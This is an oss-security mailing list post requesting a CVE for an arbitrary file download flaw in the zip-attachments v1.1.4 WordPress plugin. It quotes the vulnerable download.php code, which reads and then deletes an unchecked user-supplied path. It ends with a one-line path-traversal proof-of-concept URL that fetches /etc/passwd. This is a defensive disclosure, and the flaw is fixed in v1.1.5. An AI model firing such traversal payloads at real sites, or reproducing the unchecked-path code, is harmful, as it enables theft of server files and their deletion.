Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 12 Jun 2015 14:35:16 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: zip-attachments v1.1.4 wordpress plugin arbitrary file download
 vulnerability.

May I please have a CVE for this issue:

Title: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.
Author: Larry W. Cashdollar
Date: 6/10/2015
Vendor: Rick Torres @ricard_dev
Vendor Notified: 6/11/2015
Fixed in:  v1.1.5  by vendor.
Download: https://wordpress.org/plugins/zip-attachments/
CVEID: TBD
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

  8 if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){
  9 
 10     $file = $_GET['za_file'];
 11     $filename = $_GET['za_filename'];
 12 
 13     header('Content-Type: application/zip');
 14     header('Content-Length: ' . filesize($file));
 15     header('Content-Disposition: attachment; filename="'.$filename.'.zip"');
 16 
 17     readfile($file);
 18     unlink($file);

Any file readable by the httpd process can be downloaded.

PoC:
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ